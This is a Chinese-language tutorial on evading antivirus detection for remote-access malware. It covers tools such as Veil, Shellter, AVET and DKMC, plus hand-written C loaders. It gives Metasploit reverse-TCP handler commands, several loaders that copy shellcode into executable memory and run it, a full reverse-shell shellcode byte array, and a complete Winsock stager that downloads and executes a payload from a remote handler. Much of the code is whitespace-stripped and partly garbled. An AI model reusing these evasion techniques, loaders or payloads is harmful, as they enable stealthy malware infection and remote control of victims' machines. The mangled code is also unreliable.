一、杀软常见的三种方式

二、免杀的三种常用方式

三、利用工具实现免杀

1、veil工具基础实现免杀+进阶

2、venom免杀

3、利用kali自带的shellter进行免杀

4、利用avet实现免杀

四、利用源码编译+加载器加载代码实现免杀

1）方式一，cs+c语言代码组合拳

2）方式二，msf+c语言源代码

五、FourEye免杀

六、DKMC免杀

七、思维导图

一、杀软常见的三种方式

静态查杀(邮件类查杀一般是静态的)--一般根据特征码识别到--对文件进行特征匹配的思路

云查杀

行为查杀(也可以理解为动态查杀)--对其产生的行为进行检测

3.1可构建行为库进行动态查杀

3.2可构建日志库对日志库进行动态查杀

3.3统计学检测--构建特征学习模型--进行动态查获取就好了

二、免杀的三种常用方式

①捆绑--文件捆绑,自解压捆绑,如exe类型的

②特征码混淆思路--即混淆特征码进而绕过免杀

三种方式:

2.1代码混淆

2.2api钩子(函数混淆类)--典型dll劫持类型--即伪造一个dll文件,然后在调用dll文件的时候,先调用伪造的dll文件,在调用真实的dll文件,进而实现处理木马的操作。

2.3溢出类型漏洞特点类

③白名单--原理:杀毒软件对自己旗下的软件不检测导致

三、利用工具实现免杀1,veil工具基础实现免杀+进阶

①启动方法

cd/optlsveil（运行veil即可）

使用方法
如生成go语言的免杀马

use1listuse16setlhostipsetlport端口generate选择监听模块类msf5exploit(multi/handler)setpayloadwindows/meterpreter/reverse_tcpmsf5exploit(multi/handler)setlport3334msf5exploit(multi/handler)(multi/handler)exploit

②结合cs进行免杀
实操（生成go语言的免杀马）
1）、cs使用生成一个go语言类型的payload
2）、
use1
use17

3）需要的设置变量类（具体参数设置的含义）

4）设置

setUSERNAMElll(即代表设置完成的含义状况特点)

5）然后选择3,即自定义字符串的含义
输入cs生成的字符串即可

6）设置名字
即可完成组合拳

③结合mingw-w64
生成payload后
利用mingw-w64进行编译进行实现免杀的作用

_32输入ip,输入端口输入文件名（即自动模式）选择注入的程序选择是否要用隐身模式（建议不使用,免杀效果会变差）选择自定义字符还是自动字符选择模块进入其的目录pragmacomment(linker,"/subsystem:\"Windows\"/entry:\"mainCRTStartup\"")//windows控制台程序不出黑窗口main(){((void(*)(void))buf)();}

c语言代码2
免杀生成出现问题

(linker,"/subsystem:\"Windows\"/entry:\"mainCRTStartup\"")//windows控制台程序不出黑窗口unsignedcharbuf[]="shellcode";main(){char*Memory;Memory=VirtualAlloc(NULL,sizeof(buf),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);memcpy(Memory,buf,sizeof(buf));((void(*)())Memory)();}

[]="\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52""\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1""\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b""\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03""\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b""\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24""\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb""\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c""\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54""\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2b\x99""\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50""\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5""\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67""\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff""\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00""\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56""\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58""\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5""\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85""\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1""\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";size_tsize=sizeof(buf);intmain(){char*inject;inject=(char*)VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);//分配可读可写可执行memcpy(inject,buf,size);//复制大小进去((void(*)())inject)();//执行}

c语言代码3

(linker,"/section:.data,RWE")unsignedcharshellcode[]="";voidmain(){__asm{moveax,offsetshellcode_emit0xFF_emit0xE0}}

c语言代码6
代码

/*Base64encoder/_*/include""/*aaaackbutit'sfastandconstshouldmakeitsharedtextpage.*/staticconstunsignedcharpr2six[256]={/*ASCIItable*/64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,62,64,64,64,63,52,53,54,55,56,57,58,59,60,61,64,64,64,64,64,64,64,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,64,64,64,64,64,64,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64};intBase64decode_len(constchar*bufcoded){intnbytesdecoded;registerconstunsignedchar*bufin;registerintnprbytes;bufin=(constunsignedchar*)bufcoded;while(pr2six[*(bufin++)]=63);nprbytes=(bufin-(constunsignedchar*)bufcoded)-1;nbytesdecoded=((nprbytes+3)/4)*3;returnnbytesdecoded+1;}intBase64decode(char*bufplain,constchar*bufcoded){intnbytesdecoded;registerconstunsignedchar*bufin;registerunsignedchar*bufout;registerintnprbytes;bufin=(constunsignedchar*)bufcoded;while(pr2six[*(bufin++)]=63);nprbytes=(bufin-(constunsignedchar*)bufcoded)-1;nbytesdecoded=((nprbytes+3)/4)*3;bufout=(unsignedchar*)bufplain;bufin=(constunsignedchar*)bufcoded;while(nprbytes4){*(bufout++)=(unsignedchar)(pr2six[*bufin]2|pr2six[bufin[1]]4);*(bufout++)=(unsignedchar)(pr2six[bufin[1]]4|pr2six[bufin[2]]2);*(bufout++)=(unsignedchar)(pr2six[bufin[2]]6|pr2six[bufin[3]]);bufin+=4;nprbytes-=4;}/*Note:(nprbytes==1)wouldbeanerror,sojustingorethatcase*/if(nprbytes1){*(bufout++)=(unsignedchar)(pr2six[*bufin]2|pr2six[bufin[1]]4);}if(nprbytes2){*(bufout++)=(unsignedchar)(pr2six[bufin[1]]4|pr2six[bufin[2]]2);}if(nprbytes3){*(bufout++)=(unsignedchar)(pr2six[bufin[2]]6|pr2six[bufin[3]]);}*(bufout++)='\0';nbytesdecoded-=(4-nprbytes)3;returnnbytesdecoded;}staticconstcharbasis_64[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";intBase64encode_len(intlen){return((len+2)/3*4)+1;}intBase64encode(char*encoded,constchar*string,intlen){inti;char*p;p=encoded;for(i=0;ilen-2;i+=3){*p++=basis_64[(string[i]2)0x3F];*p++=basis_64[((string[i]0x3)4)|((int)(string[i+1]0xF0)4)];*p++=basis_64[((string[i+1]0xF)2)|((int)(string[i+2]0xC0)6)];*p++=basis_64[string[i+2]0x3F];}if(ilen){*p++=basis_64[(string[i]2)0x3F];if(i==(len-1)){*p++=basis_64[((string[i]0x3)4)];//*p++='=';}else{*p++=basis_64[((string[i]0x3)4)|((int)(string[i+1]0xF0)4)];*p++=basis_64[((string[i+1]0xF)2)];}//*p++='=';}*p++='\0';returnp-encoded;}

代码

define_BASE64_H_ifintBase64encode_len(intlen);intBase64encode(char*coded_dst,constchar*plain_src,intlen_plain_src);intBase64decode_len(constchar*coded_src);intBase64decode(char*plain_dst,constchar*coded_src);

六、DKMC免杀

[*](gen)将msf的shellcode注入到一个BMP图像[*](web)启动web服务用来分发BMP图像[*](ps)生成ps的payload[*](sc)将msf生成的raw文件转为shellcode[*](exit)退出

生成步骤与原理

先利用msf生成raw文件利用sc讲raw文件转换为shellcode利用gen将上一步的shellcode注入到一个BMP图像利用ps生成基于powershell的BMP文件的payload用web提供的简单web服务进行分发BMP文件

详细参考教程：

七、思维导图

meta64位过杀软

过32位

/**AC-basedstagerclientcompatwiththeMetasploitFramework*basedonadiscussionontheMetasploitFrameworkmailinglist**@作者RaphaelMudge(raffi@)*@licenseBSDLicense.**Relevantmessages:*****//*initwinsock*/voidwinsock_init(){WSADATAwsaData;WORDwVersionRequested;wVersionRequested=MAKEWORD(2,2);if(WSAStartup(wVersionRequested,wsaData)0){printf("ws2_32.dllisoutofdate.\n");WSACleanup();exit(1);}}/*aquickroutinetoquitandreportwhywequit*/voidpunt(SOCKETmy_socket,char*error){printf("Badthings:%s\n",error);closesocket(my_socket);WSACleanup();exit(1);}/*attempttoreceivealloftherequesteddatafromthesocket*/intrecv_all(SOCKETmy_socket,void*buffer,intlen){inttret=0;intnret=0;void*startb=buffer;while(tretlen){nret=recv(my_socket,(char*)startb,len-tret,0);startb+=nret;tret+=nret;if(nret==SOCKET_ERROR)punt(my_socket,"Couldnotreceivedata");}returntret;}/*establishaconnectiontoahost:port*/SOCKETwsconnect(char*targetip,intport){structhostent*target;structsockaddr_insock;SOCKETmy_socket;/*setupoursocket*/my_socket=socket(AF_INET,SOCK_STREAM,0);if(my_socket==INVALID_SOCKET)punt(my_socket,"Couldnotinitializesocket");/*resolveourtarget*/target=gethostbyname(targetip);if(target==NULL)punt(my_socket,"Couldnotresolvetarget");/*copyourtargetinformationintothesock*/memcpy(__addr,target-h_addr,target-h_length);_family=AF_INET;_port=htons(port);/*attempttoconnect*/if(connect(my_socket,(structsockaddr*)sock,sizeof(sock)))punt(my_socket,"Couldnotconnecttotarget");returnmy_socket;}intmain(intargc,char*argv[]){ULONG32size;char*buffer;void(*function)();winsock_init();if(argc!=3){printf("%s[host][port]\n",argv[0]);exit(1);}/*connecttothehandler*/SOCKETmy_socket=wsconnect(argv[1],atoi(argv[2]));/*readthe4-bytelength*/intcount=recv(my_socket,(char*)size,4,0);if(count!=4||size=0)punt(my_socket,"readastrangeorincompletelengthvalue\n");/*allocateaRWXbuffer*/buffer=VirtualAlloc(0,size+5,MEM_COMMIT,PAGE_EXECUTE_READWRITE);if(buffer==NULL)punt(my_socket,"couldnotallocatebuffer\n");/*prepalittleassemblytomoveourSOCKETvaluetotheEDIregisterthanksmihiforpointingthisoutBF78563412=movedi,0x12345678*/buffer[0]=0xBF;/*copythevalueofoursockettothebuffer*/memcpy(buffer+1,my_socket,4);/*readbytesintothebuffer*/count=recv_all(my_socket,buffer+5,size);/*castourbufferasafunctionandcallit*/function=(void(*)())buffer;function();return0;}